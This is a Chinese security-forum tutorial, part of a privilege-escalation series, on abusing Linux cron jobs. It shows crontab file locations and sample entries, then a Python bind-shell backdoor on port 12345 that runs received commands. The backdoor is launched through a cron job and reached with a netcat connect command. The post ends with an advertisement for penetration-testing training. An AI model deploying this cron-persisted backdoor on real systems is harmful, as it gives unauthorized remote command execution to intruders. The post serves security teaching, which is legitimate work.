提权(14)之定时任务

[复制链接]
发表于 2025-9-4 16:19:35 | 显示全部楼层 |阅读模式
含义:在指定的时间执行设定好的任务,如关机、执行命令、备份数据库等。

方式一,以用户名为名字的定时任务。
  1. /var/spool/cron
复制代码
此目录下会存放以用户名命名的文件的crontab文件,或者是/etc/crontab文件中存在定时任务、
本例中在/var/spool/cron 有一个root为用户名的定时任务,
  1. */1 * * * * touch /tmp/xxxx.xx
复制代码
上面的代码表示,每一分钟创建文件xxxx.xx,经过测试,不生效则重启。
  1. systemctl restart crond
复制代码


相关数据如图:
截图202509040929411624.png


方式二:
编辑文件 /etc/crontab

打开如图:
截图202509040822041286.png
  1. # m h dom mon dow user command
复制代码
m:分钟 h:小时 dom:天 mon:月 dow:星期几 user:用户 command:命令

  1. */1 * * * * root mkdir /tmp/93dayuebing
复制代码

查看tmp目录
截图202509040956496737.png


扩展,利用定时任务反弹shell
  1. # -*- coding: utf-8 -*-
  2. import socket
  3. import os
  4. import socket
  5. import os
  6. #AF_INET 代表ipv4 SOCK_STREAM==>tcp
  7. s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  8. # 绑定本地监听端口12345
  9. s.bind(('0.0.0.0', 12345))
  10. #设定最多5个客户端连接
  11. s.listen(5)

  12. while True:
  13.         conn, addr = s.accept() #等待客户端连接,客户端未连接,进入阻塞模式
  14.         for i in range(10):
  15.                 cmd = conn.recv(1024) #接收来自客户端的最多1024自己的内容
  16.                 print(cmd) #输出接收到的字节流
  17.                 command = cmd.decode(encoding='utf-8') #把字节流转换为字符串
  18.                 if command.startswith("cd"):        #如果是cd开头走里面
  19.                         os.chdir(command[2:].strip())
  20.                         result = os.getcwd()
  21.                 else:                                                                #不是cd 开头走下面
  22.                         result = os.popen(command).read()  #执行命令,读取结果
  23.                 if result:
  24.                         conn.send(result.encode('utf-8'))        #发送结果给客户端
  25.                 else:
  26.                         conn.send(b'ok')
复制代码

添加定时任务
截图202509041032038213.png


本地系统执行nc -nv 目标IP 12345
截图202509041037265502.png

目标已上线。
截图202509040957494902.png
必火网络安全培训,北京实地培训,月月有开班,零基础入门,四个月打造渗透高手。
详情请加微信:nvhack/153-2000-4362,手机微信同号。
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

QQ|Archiver|手机版|小黑屋|女黑客安全网 |网站地图 | 津ICP备17008032号-3

GMT+8, 2026-2-2 05:17 , Processed in 0.090770 second(s), 28 queries .

Powered by Discuz! X3.5

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表